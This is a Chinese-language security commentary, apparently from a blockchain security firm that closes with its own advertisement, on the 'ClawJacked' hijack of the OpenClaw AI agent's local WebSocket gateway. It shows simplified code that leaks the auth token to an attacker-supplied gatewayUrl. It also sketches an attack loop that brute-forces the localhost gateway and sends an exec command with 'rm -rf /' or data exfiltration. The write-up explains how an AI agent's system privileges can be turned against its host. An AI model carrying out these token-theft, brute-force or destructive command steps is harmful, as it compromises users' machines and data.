夜雨聆风这次爆出来的 OpenClaw Gateway 漏洞,本质已经不只是“一个 bug”,而是AI代理架构+本地服务信任模型的系统性崩塌。OpenClaw 的核心设计是:在本地启动一个 WebSocket Gateway,作为 AI agent 调度所有能力。问题在于,这个 Gateway 被设计为“默认信任本机调用”,但浏览器恰好可以成为跨边界的桥梁,只要用户访问恶意网站,攻击就已经开始 😈
从漏洞根因看,这是一个非常典型但被“AI化放大”的安全错误:未验证输入 + 自动执行 + 高权限环境。Control UI 会直接从 URL 参数读取 gatewayUrl,并在页面加载时自动建立 WebSocket 连接,而且还会携带认证 token,这一步几乎等同于“自动把钥匙交出去”
如果用代码还原这个致命逻辑,大概是这样的:
// 漏洞核心逻辑(简化)constgatewayUrl=getQueryParam("gatewayUrl");// ⚠️ 未校验来源constws=newWebSocket(gatewayUrl);// 自动附带认证信息ws.send({token: localStorage.getItem("auth_token")});
攻击者只需要构造一个 URL:
https://***.com?gatewayUrl=wss://***.com用户甚至不用点击按钮,只要页面加载,这段逻辑就会主动把 token 发给攻击者
但真正危险的不是“token泄露”,而是后面的链式利用——因为 OpenClaw 的 Gateway 本身就是“系统控制中枢”。一旦攻击者拿到 token,就可以反向连接本地 Gateway,并执行高权限操作
更完整的攻击链(现实中已经被验证)是这样的:
// 攻击端逻辑(简化)ws=newWebSocket("ws://127.0.0.1:gateway_port");for (leti=0; i<1000; i++) {tryPassword(ws, guess()); // 暴力破解弱密码}if (auth_success) {registerTrustedDevice();sendCommand("exec", "rm -rf / or exfiltrate data");}
这里有两个致命点:👉 WebSocket 不校验 Origin(允许任意网站调用) 👉 本地 Gateway 使用弱认证甚至可暴力破解
也就是说——浏览器里的 JavaScript 可以“穿透 localhost”,直接攻击本机服务,这是一种典型的 Browser → Local Service Pivot
更进一步,攻击者拿到控制权后,能力几乎是无限的:📂 读取文件🔑 窃取 API Key / Token⚙️ 修改 agent 行为策略💻 在宿主机执行命令
因为 OpenClaw 本身就是一个“系统级 AI 操作员”,默认拥有极高权限
如果从 exploit engineering 的角度总结,这条链非常“干净”:
Untrusted URL Param↓WebSocket Hijack↓Token Leakage / Weak Auth↓Gateway Takeover↓Agent Command Execution↓Full System Compromise
而且它几乎不需要传统漏洞(如缓冲区溢出),完全是逻辑漏洞驱动的远程代码执行
更值得警惕的是,这类攻击甚至可以演化成“零点击”或“弱交互”形态。比如:👉 访问一个网页👉 打开一个分享链接👉 AI 自动加载 UI
攻击链就已经触发,这一点与传统 exploit 完全不同
现实影响也已经非常严重,安全研究观测到:👉 数万 OpenClaw 实例被扫描或入侵👉 API 密钥、通信数据被批量窃取👉 被用于进一步传播恶意代码和信息窃取
甚至出现了专门命名的攻击变种 “ClawJacked”,强调其“无需植入恶意程序,仅靠浏览器即可接管系统”的特性
从安全架构角度,这个漏洞揭示了一个更深层问题:
OpenClaw 把三件本不该放在一起的东西放在了一起:👉 不可信输入(网页 / URL)👉 自动执行逻辑(AI agent)👉 系统级权限(本地操作能力)
这在传统安全模型里是绝对禁忌
如果用一句专业判断来总结这次事件的本质:👉 这不是Web漏洞,而是“AI代理=本地后门”的设计暴露
最后给一个更硬核的现实结论:
过去:黑客需要利用漏洞才能 RCE现在:只要你打开网页,AI 就帮他执行命令
而 OpenClaw Gateway,只是这个新时代攻击模型的第一个“样本” 💀
ChainSafeAI(链熵科技)专注于区块链生态安全,以“数据驱动 + 技术赋能”构建360°全方位安全防护体系,服务于交易所、金融机构、OTC服务商及加密资产投资者。
公司提供覆盖KYT风险监测、智能合约审计、加密资产追踪、区块链漏洞测试等在内的全维度安全与合规技术解决方案,助力客户防范洗钱、诈骗等风险,保障业务合规运行。
通过实时风险预警、合规审查与资金溯源分析,协助客户识别链上异常行为、防范洗钱及诈骗风险、降低被盗损失并提升资产追回可能性。
联系我们
电话:+85268824033
官网:www.chainsafeai.com
地址:香港九龙尖沙咀柯士甸路7-9号焕利商业大厦7楼63室
